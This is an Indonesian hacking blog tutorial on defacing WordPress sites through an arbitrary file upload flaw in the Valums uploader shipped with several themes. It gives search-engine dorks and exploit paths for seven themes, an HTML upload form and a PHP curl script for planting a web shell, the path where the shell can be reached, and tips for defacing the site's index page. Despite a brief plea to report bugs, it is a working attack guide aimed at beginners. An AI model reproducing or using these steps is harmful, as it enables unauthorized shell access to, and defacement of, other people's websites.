Hello World ; Malamm Fans, Please Say Hello Haters ;*
xixixhihi, kali ini gua bakal Share salah satu Bug yang ada pada beberapa Themes di CMS WordPress
sebenernye sih ini eXploit lawas, kali aja msh
yupz, Nue bakal Share Tutorial Deface dengan eXploit WordPress Valums Uploader Shell Upload.
eXploit ini memanfaatkan Bug pada valums uploader di Themes nya :D
Lanjut intip tutorialnye ;*
1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php
2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php
3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php
4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php
5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php
6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php
7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php
(kembangin Dork yang sudah ada dgn imajinasi bokepers lu, biar dapat yang vuln n verawan)
1. Dorking menggunakan Search Engine
2. Pilih target kalian, Lalu masukan eXploitnyee.
sesuaikan eXploit dengan Dork yang kalian gunakan.
contoh: target.c0li/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php
*karena disini saya dorking dgn dork eptonic themes, ya eXploitnya juga hrs ituh :D
3. Vulnerability ~ {"error":"No files were uploaded.",
kira2 sih begitu, kalo ada ciri2 vuln yang lain, komen yupz br0 |
Script CSRF Upload:
<form enctype="multipart/form-data"
action="target/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
*copy script diatas, ganti tulisan yang berwarna merah dgn eXploit target yang lagi kalian gunakan.
*save dgn ekstensi .html
4. Buka Script yang tadi sudah di Save dgn browser kalian , Lalu silahkan Upload Shell Lu
disini gua mencoba Bypass Ekstensi shell gua, karena target not vuln ekstensi .php |
6. Shell Akses: /wp-content/uploads/tahun/bulan/namashellLu.php
contoh: target.c0li/wp-content/uploads/2016/12/nueenggak.php
Done br0~ |
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*
tambahan , ini ada Script upload .phpnya:
<?php
$uploadfile="namashell.php";
$ch =
curl_init("target.c0li/wordpressEXPLOIT/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
*sama kek tadi, sesuaikan ama yang lu gunakan
*save dgn ekstensi .php
*bila memakai script upload yang ini, Shell Akses nya sama aja kok :D
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked~
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: Packet Storm
./Nuenomaru
Buang semua Mimpi yang takkan Kembali, Rangkailah kisah yang Berbeda |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
0 komentar:
Posting Komentar